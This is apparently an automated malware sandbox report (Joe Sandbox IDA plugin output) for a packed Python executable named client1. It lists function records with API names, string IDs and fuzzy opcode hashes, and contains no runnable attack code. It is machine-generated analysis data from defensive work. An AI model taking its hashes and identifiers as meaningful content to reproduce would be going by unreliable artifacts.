                                                    • Instruction ID: 0b5cde92503088ed5251b5e6869c8d30d381f6069165cb942e77f9cf8e1521a9
                                                    • Opcode Fuzzy Hash: 7d54ae8d25dbb77536147f2b5954e326a1cde14a89e02d91d4bda525f7568c68
                                                    • Instruction Fuzzy Hash: 723160A1B1A50291FF56DB3AE4952BD2360EF84BA4F588235DE7D067B5DE2CD8948300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-4184598959
                                                    • Opcode ID: 95b42a7a6c77e1ee42d9360d44cd47314993f2cb00c775376b8053bca88cdcdc
                                                    • Instruction ID: 185283242f1a0a1f4dd4a85779473d74aa0c06afb67a7d1f4fbc2a74f0ff5654
                                                    • Opcode Fuzzy Hash: 95b42a7a6c77e1ee42d9360d44cd47314993f2cb00c775376b8053bca88cdcdc
                                                    • Instruction Fuzzy Hash: BC316EA1B1A60281EE46DB3AE4D52BD2790EF84BD4F589135DE7E067B5DE2CE885C300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
                                                    • String ID: bool$feed
                                                    • API String ID: 3415927029-2849697477
                                                    • Opcode ID: 75989d3a8ab21030ecd09d936046dd064d493ce40fe554d82fa1436c5afcabda
                                                    • Instruction ID: c90eb331598d3a54dd68efdce0ac8892764b180d57ce7d57643d4079ba96a0e3
                                                    • Opcode Fuzzy Hash: 75989d3a8ab21030ecd09d936046dd064d493ce40fe554d82fa1436c5afcabda
                                                    • Instruction Fuzzy Hash: EB3162B1A1BE0282FA629B36E49117E6760FF44BC4F488035DE6D07776DE2DE4918740
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF6D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF7B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFA5
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFEB
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction ID: d7c5080cdd8f26468dbd7bdde6db1f1dbefc9b6bdc914f9bdde3b44db8140bda
                                                    • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction Fuzzy Hash: E131A121A1A78291FE71BF22AC005F5A2AAFF08BB4F994535DD2D87390DF3CE5458721
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79F6267CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF79F6264DF
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79F6264B6
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79F6264F3
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79F62653A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    • API String ID: 1662231829-3498232454
                                                    • Opcode ID: 2dc19ef5ba30c1755b370eb24f27a07330b7d4ecbeaa7c6206d14ea3a4c7ebc1
                                                    • Instruction ID: 10210cae02a5da7580aa32472d1a66e78c26cbe670e770a5c560e5b427f1dcde
                                                    • Opcode Fuzzy Hash: 2dc19ef5ba30c1755b370eb24f27a07330b7d4ecbeaa7c6206d14ea3a4c7ebc1
                                                    • Instruction Fuzzy Hash: 9E315E11B187C240FA30BB31E9552FAD25AAF98784FC40431DA6E96BDAEE2DE5048721
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 3723044601-876015163
                                                    • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction ID: 9f2e00563ab7892172867902b63dd349e0876b4b8af7bc4b5835a1d096cd09be
                                                    • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction Fuzzy Hash: 77214422B08B8281EB60FB35F8400E9E366FF85794F944531DB6C93BA9EF2DD5418710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Item$Dict_Err_FormatFromObject_Unicode_$AttrClearErrorFilenameImportModule_Object
                                                    • String ID: <module>
                                                    • API String ID: 2466898028-217463007
                                                    • Opcode ID: 6b8acac036cbf7e295481d1c2732eb526df169ef99cb2573ea467a0dbd242c8b
                                                    • Instruction ID: 5cee9c463810e5ef46d1b4f8326721a4aba3c8d2ce0824f9d82c84c4c67b59f1
                                                    • Opcode Fuzzy Hash: 6b8acac036cbf7e295481d1c2732eb526df169ef99cb2573ea467a0dbd242c8b
                                                    • Instruction Fuzzy Hash: CE2157E1A0BA1681FA169B77E8902792BA0AF14BC4F44C13DDE2D077B0EF2CA4918340
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A62F
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A644
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A665
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A692
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6B4
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6CF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 6b14f4b34ada3312421ba959f39f9715d9be68c8868fa5de67aefdf45a5e0ce4
                                                    • Instruction ID: 7d43b17c794f12c4ac64cc17aac40b9b2e6bd3271b368f03124712aa789b55af
                                                    • Opcode Fuzzy Hash: 6b14f4b34ada3312421ba959f39f9715d9be68c8868fa5de67aefdf45a5e0ce4
                                                    • Instruction Fuzzy Hash: 8E213824E0C7D242FA78B73156511FAE24B5F56BB0F840734E83E07AD6DEADB400A630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_$Arg_DeallocFreeKeywordsMem_MemoryParseStringTuple
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 955997460-3732962867
                                                    • Opcode ID: 7476e3eac392aa3e17da684dcdc0e466eacd9f7d3d7383a05109996a5e4262bf
                                                    • Instruction ID: 6dc461ae8a81eb74eb1cd8f7960e357c4f687b4e97e544687930f8f6bc071d8f
                                                    • Opcode Fuzzy Hash: 7476e3eac392aa3e17da684dcdc0e466eacd9f7d3d7383a05109996a5e4262bf
                                                    • Instruction Fuzzy Hash: BC213DA1A1AB03D1EA129F35E8500BB67A9FF84B80F4000B2DD5D577A4EE2DF45BC760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportList_Module_Object
                                                    • String ID: <module>
                                                    • API String ID: 705353228-217463007
                                                    • Opcode ID: 4e5f990220d73f4e6b8073e872d95d55646c66385a8aa30aefa6814886ffe265
                                                    • Instruction ID: b91506569afd215d6a3be0ca44e2c87c27df3794c86daccdb6b433fb163c7f5b
                                                    • Opcode Fuzzy Hash: 4e5f990220d73f4e6b8073e872d95d55646c66385a8aa30aefa6814886ffe265
                                                    • Instruction Fuzzy Hash: 76211DE5A0BA1280FA279F77E99427867A5AF14BD4F08C13ECD3D077B4DE2CA4958301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportList_Module_Object
                                                    • String ID: <module>
                                                    • API String ID: 705353228-217463007
                                                    • Opcode ID: 879e76747261c4a6ae7e890e62059d6275078ca7420713bb20aac4bf1ddc663c
                                                    • Instruction ID: aa984bd2d180805f7e3ef5466b819f273b61855efce99710dd6c8545d8710b5d
                                                    • Opcode Fuzzy Hash: 879e76747261c4a6ae7e890e62059d6275078ca7420713bb20aac4bf1ddc663c
                                                    • Instruction Fuzzy Hash: 7121EAE6E0BA0281EA178F77E99427967A1AF14BD9F08C13DCD2D077B0DE2CA4958301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$name
                                                    • API String ID: 3545102714-4190364640
                                                    • Opcode ID: dd7e525c6f15f79c0475ece0fbfed555bc2cf029fe1f0485a725b85a65e47b36
                                                    • Instruction ID: bde4f137897cf522e20f3da755de1ab20c67c2098a0a7e61852747b34b94f6c7
                                                    • Opcode Fuzzy Hash: dd7e525c6f15f79c0475ece0fbfed555bc2cf029fe1f0485a725b85a65e47b36
                                                    • Instruction Fuzzy Hash: 3521A1B1B0AA96C5EB55EF22E4402AA2368EB44B84F4540B5DE4D47754CF2CE847C330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$numeric
                                                    • API String ID: 3545102714-2385192657
                                                    • Opcode ID: 35c9d41c65e7a6057b424292e649dab30af98cc9056b9a63245a5d832090e137
                                                    • Instruction ID: 21169802ce1ee58fe1b240cfea16f405d7d8eb8c63b87688e3e3ea0de472e94a
                                                    • Opcode Fuzzy Hash: 35c9d41c65e7a6057b424292e649dab30af98cc9056b9a63245a5d832090e137
                                                    • Instruction Fuzzy Hash: FD21DEB2B0AA96C5EB55AF22E4441AA2368EB44B84F5940B5DF1D43364CF2CE457C330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$decimal
                                                    • API String ID: 3545102714-2474051849
                                                    • Opcode ID: 37a4153ce9cd5952ba336a7a13e7d13d1a4106d113bef46bdc421c90457116d1
                                                    • Instruction ID: 30adb9bd0b89d3930804dbb1056e009589ea1bdb3651b833de3c703945fb5713
                                                    • Opcode Fuzzy Hash: 37a4153ce9cd5952ba336a7a13e7d13d1a4106d113bef46bdc421c90457116d1
                                                    • Instruction Fuzzy Hash: 4721CDB1B1AA92C6EB55AF22E4401AA636CFB44B88F4940B5CE4D57764CF2DE447C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction ID: 810f57fa96b3e569063fe0804fcb4f4afbcab54fabd34b9d9e30289ec406c851
                                                    • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction Fuzzy Hash: D9118421718B8286F760BB22E854369B7AAFB58FE4F840234D96D87794CF3CD404C750
                                                    APIs
                                                    Strings
                                                    • invalid decimal point or unsupported combination of LC_CTYPE and LC_NUMERIC, xrefs: 00007FFBAA716F53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: StringUnicode_$CharDeallocErr_FromWidembstowcs
                                                    • String ID: invalid decimal point or unsupported combination of LC_CTYPE and LC_NUMERIC
                                                    • API String ID: 4243716454-835262532
                                                    • Opcode ID: be6c2bc1afa28818636f2753519d6f4b24a3387ec2e2e3dcba228cf474a20bef
                                                    • Instruction ID: 10c870dcc50133397b33dabef1c39e702f61c0818b364de84676a2e9afbfa3e5
                                                    • Opcode Fuzzy Hash: be6c2bc1afa28818636f2753519d6f4b24a3387ec2e2e3dcba228cf474a20bef
                                                    • Instruction Fuzzy Hash: 8C0162A1B1AA02C1EF028F31E84457A67E8AF48BC0F045472ED0E467B4EE3DE447C310
                                                    APIs
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C4EC
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C543
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C553
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C5CB
                                                    • PyMem_Free.PYTHON311(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C622
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C66E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memmove$FreeMem_abort
                                                    • String ID:
                                                    • API String ID: 100173348-0
                                                    • Opcode ID: 2c6e3f68204004541e7d797dec9d17c50c8afdb5f668a568ec833fb38442b9e8
                                                    • Instruction ID: 82331e22a75f51f7712918e1b2f0170a769afc82db6fae61353043f505fa1004
                                                    • Opcode Fuzzy Hash: 2c6e3f68204004541e7d797dec9d17c50c8afdb5f668a568ec833fb38442b9e8
                                                    • Instruction Fuzzy Hash: 066191B260AB45D1DA62CF16F4502ABB7A8FB88BC4F540132EE8D57B69DE3CD146C710
                                                    APIs
                                                    • PyLong_FromSsize_t.PYTHON311 ref: 00007FFBAB492C50
                                                    • PyLong_FromSsize_t.PYTHON311 ref: 00007FFBAB492C76
                                                    • PyNumber_Remainder.PYTHON311 ref: 00007FFBAB492C93
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492CA5
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492CB4
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492D09
                                                      • Part of subcall function 00007FFBAB493450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493459
                                                      • Part of subcall function 00007FFBAB493450: fprintf.MSPDB140-MSVCRT ref: 00007FFBAB493469
                                                      • Part of subcall function 00007FFBAB493450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493473
                                                      • Part of subcall function 00007FFBAB493450: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB49347C
                                                      • Part of subcall function 00007FFBAB493450: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493482
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t__acrt_iob_func$Number_Remainderabortfflushfprintf
                                                    • String ID:
                                                    • API String ID: 1333916573-0
                                                    • Opcode ID: 988bd1455c911e46e63481f5793d118fb64da56076abf6250ab8b5c248bcde97
                                                    • Instruction ID: 127697ef2990c1688bf856a74ea70a18d363882621128856b47e9513aaca2d5d
                                                    • Opcode Fuzzy Hash: 988bd1455c911e46e63481f5793d118fb64da56076abf6250ab8b5c248bcde97
                                                    • Instruction Fuzzy Hash: 8031A6B1F0BA4642EE564B3AE59427D5361AF55FE4F089234DE7E077E9DE2CE4828300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatObject_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 2679858911-0
                                                    • Opcode ID: 12b4c4cf3228bb0d2d143253dfe1ec6c57aca567516acc9888419e859067e15b
                                                    • Instruction ID: 656b6e8983623b122357d00c99749a305ae9c84d59e6f5c745ca3d34864de241
                                                    • Opcode Fuzzy Hash: 12b4c4cf3228bb0d2d143253dfe1ec6c57aca567516acc9888419e859067e15b
                                                    • Instruction Fuzzy Hash: C14173B2E0AB16D5EB569F75D8000BF27A8AB45B94B044072DE0E62A94DF3DE947C360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatFreeMem_Object_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 3064042339-0
                                                    • Opcode ID: a16e780cdf499231d06022fa089847657aad77cb3ed2b07bbf0e76c6e2031ded
                                                    • Instruction ID: 84b491daa1b4007492cd94a7b4fb90971290591fca6b2879196af266a69bc870
                                                    • Opcode Fuzzy Hash: a16e780cdf499231d06022fa089847657aad77cb3ed2b07bbf0e76c6e2031ded
                                                    • Instruction Fuzzy Hash: 834160B2A0AB02D5EB668F75D8500BE27A8AB44B94F1440B2DE0E52B95DE3DE543C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$Number_
                                                    • String ID:
                                                    • API String ID: 4245833954-0
                                                    • Opcode ID: 324df5c6c456926af738d9154dbada473049b4658e8eab271715651b46320d21
                                                    • Instruction ID: 07973e157972e56a9f820d493ac69be708be3482b2ca66322b770602fad09cd5
                                                    • Opcode Fuzzy Hash: 324df5c6c456926af738d9154dbada473049b4658e8eab271715651b46320d21
                                                    • Instruction Fuzzy Hash: 892141B1B0BA5641EE168B36D5A417C6360AF55BF4F089234DE7E077E5DE2CE4468301
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
